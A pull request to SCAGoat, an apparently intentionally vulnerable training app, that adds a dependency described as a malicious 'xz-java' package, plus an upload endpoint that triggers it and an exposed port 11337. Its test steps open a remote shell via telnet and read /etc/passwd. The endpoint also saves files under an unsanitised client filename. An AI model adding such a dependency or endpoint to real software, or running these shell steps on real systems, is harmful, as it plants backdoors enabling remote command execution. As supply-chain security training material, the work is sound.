### PR TITLE
chore: add compromised package (xz-java)

### DIFF
--- a/README.md
+++ b/README.md
@@ -7,7 +7,7 @@
 
 ## What is SCA-Goat?
 
-SCAGoat is an application for Software Composition Analysis (SCA) that focuses on vulnerable JAR dependencies used in development code, providing users with hands-on learning opportunities to understand potential attack scenarios. It is designed to identify vulnerabilities that may arise from using vulnerable JAR files.
+SCAGoat is an application for Software Composition Analysis (SCA) that focuses on vulnerable and compromised JAR dependencies used in development code, providing users with hands-on learning opportunities to understand potential attack scenarios. It is designed to identify vulnerabilities that may arise from using vulnerable JAR files.
 
 
 
@@ -15,15 +15,18 @@ SCAGoat is an application for Software Composition Analysis (SCA) that focuses o
 
 The CVEs covered under SCAGoat are primarily critical and high severity, which have a CVSS score of 9. This aid in understanding the vulnerable package being used and its potential for exploitation. 
 
+In addition, there is one compromised package, that lacks a CVE, but is malicious by nature and cannot be detected with traditional SCA scanners.
 
-| CVE           | Package Name | Link  | 
-|---------------|--------------|-------|
-| CVE-2023-42282 | IP           | [https://nvd.nist.gov/vuln/detail/CVE-2023-42282](https://nvd.nist.gov/vuln/detail/CVE-2023-42282) |     
-| CVE-2017-1000427 | Marked     | [https://nvd.nist.gov/vuln/detail/CVE-2017-1000427](https://nvd.nist.gov/vuln/detail/CVE-2017-1000427) |     
-| CVE-2017-16114 | Marked       | [https://github.com/markedjs/marked/issues/926](https://github.com/markedjs/marked/issues/926) |
-| CVE-2021-44228 | log4j        | [https://nvd.nist.gov/vuln/detail/CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)|
-| CVE-2020-9547 | Jackson-Binding | [https://nvd.nist.gov/vuln/detail/CVE-2020-9547](https://nvd.nist.gov/vuln/detail/CVE-2020-9547)|
-|CVE-2021-33623 | trim-newlines | [https://nvd.nist.gov/vuln/detail/CVE-2021-33623](https://nvd.nist.gov/vuln/detail/CVE-2021-33623)|
+
+| CVE                        | Package Name    | Link  | 
+|----------------------------|-----------------|-------|
+| CVE-2023-42282             | IP              | [https://nvd.nist.gov/vuln/detail/CVE-2023-42282](https://nvd.nist.gov/vuln/detail/CVE-2023-42282) |     
+| CVE-2017-1000427           | Marked          | [https://nvd.nist.gov/vuln/detail/CVE-2017-1000427](https://nvd.nist.gov/vuln/detail/CVE-2017-1000427) |     
+| CVE-2017-16114             | Marked          | [https://github.com/markedjs/marked/issues/926](https://github.com/markedjs/marked/issues/926) |
+| CVE-2021-44228             | log4j           | [https://nvd.nist.gov/vuln/detail/CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)|
+| CVE-2020-9547              | Jackson-Binding | [https://nvd.nist.gov/vuln/detail/CVE-2020-9547](https://nvd.nist.gov/vuln/detail/CVE-2020-9547)|
+| CVE-2021-33623             | trim-newlines   | [https://nvd.nist.gov/vuln/detail/CVE-2021-33623](https://nvd.nist.gov/vuln/detail/CVE-2021-33623)|
+| Malicious Package (No CVE) | xz-java         | [https://central.sonatype.com/artifact/io.github.xz-java/xz-java](https://central.sonatype.com/artifact/io.github.xz-java/xz-java)|
 
 
 ## Steps to run SCAGoat

--- a/backend/pom.xml
+++ b/backend/pom.xml
@@ -42,7 +42,14 @@
 			<artifactId>unboundid-ldapsdk</artifactId>
 			<version>3.1.1</version>
 		</dependency>
-		
+
+		<!-- Malicious XZ Java -->
+		<dependency>
+			<groupId>io.github.xz-java</groupId>
+			<artifactId>xz-java</artifactId>
+			<version>1.9.2</version>
+		</dependency>
+
 		<!-- CVE-2020-9547 -->
 		<dependency>
 			<groupId>br.com.anteros</groupId>

--- a/backend/src/main/java/com/acme/foo/FileUploadApi.java
+++ b/backend/src/main/java/com/acme/foo/FileUploadApi.java
@@ -1,0 +1,59 @@
+package com.acme.foo;
+
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.springframework.http.HttpStatus;
+import org.springframework.http.ResponseEntity;
+import org.springframework.web.bind.annotation.*;
+import org.springframework.web.multipart.MultipartFile;
+import org.tukaani.xz.LZMA2Options;
+import org.tukaani.xz.XZOutputStream;
+
+import java.io.IOException;
+import java.nio.file.Files;
+import java.nio.file.Path;
+import java.nio.file.Paths;
+
+@RestController
+@CrossOrigin("*")
+@RequestMapping("/api/files")
+public class FileUploadApi {
+
+	private static final Logger logger = LogManager.getLogger(FileUploadApi.class);
+
+
+	private static final String UPLOAD_DIR = "uploads/";
+
+	@PostMapping("/upload")
+	public ResponseEntity<String> uploadFile(@RequestParam("file") MultipartFile file) {
+		try {
+			// Ensure the uploads directory exists
+			Path uploadPath = Paths.get(UPLOAD_DIR);
+			if (!Files.exists(uploadPath)) {
+				Files.createDirectories(uploadPath);
+			}
+
+			// Get the file and save it
+			byte[] bytes = file.getBytes();
+			Path path = Paths.get(UPLOAD_DIR + file.getOriginalFilename());
+			Files.write(path, bytes);
+
+			Path zipPath = Paths.get(UPLOAD_DIR + file.getOriginalFilename() + ".xz");
+			LZMA2Options options = new LZMA2Options();
+			XZOutputStream xz = new XZOutputStream(Files.newOutputStream(zipPath), options);
+
+			byte[] buf = new byte[8192];
+			int size;
+			while ((size = System.in.read(buf)) != -1) {
+				xz.write(buf, 0, size);
+			}
+
+			xz.finish();
+
+			return ResponseEntity.status(HttpStatus.OK).body("File uploaded successfully: " + file.getOriginalFilename() + " -> " + path + " -> " + zipPath);
+		} catch (IOException e) {
+			logger.error("Failed to upload file", e);
+			return ResponseEntity.status(HttpStatus.INTERNAL_SERVER_ERROR).body("Failed to upload file: " + e.getMessage());
+		}
+	}
+}

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -6,6 +6,7 @@ services:
       dockerfile: Dockerfile-backend
     ports:
       - 8080:8080
+      - 11337:11337
   frontend:
     build: 
       context: .


### PR DESCRIPTION
*** This attack Simulates a use-case like the XZ-Utils Attack, where it contains malicious code only in the compiled package,
and there is not CVE for it.
You can also see in the package repository that maven doesn't detect any vulnerabilities for it:
https://central.sonatype.com/artifact/io.github.xz-java/xz-java/versions

*** The malicious code opens a remote shell port that allows to execute commands on the remote computer.
The FileUploadApi is the API that triggers the library and contains a code that calls the malicious
package. The malicious package will upload and compress the file, but will also the remote execution.


How to test:
1. We will start the application as described in the README file.

2. We will upload a file from the local computer using the following request:
curl -X POST http://localhost:8080/api/files/upload -H "Content-Type: multipart/form-data" -F "file=@/Users/yoadfekete/Desktop/random.json"

3. The remote shell is now open and we can run a command. To test we will execute:
telnet localhost 11337
And in the telnet command we will execute our command:
cat /etc/passwd /tmp/evil-out.sh ^\n
We should now quit the telnet session.

4. Now we can see in the container that the command has been executed.
This malicious code was for demonstration reasons, but in the same manner, we could include any malicious code we want,
without even needing the remote shell.

I have a demo recorded (https://www.loom.com/share/3b60c1e195a7462fbd682e195104848d?sid=f63224d4-1830-4872-a5b5-e67aba73c7ac), let me know how to send it to you so you can upload it to the channel.

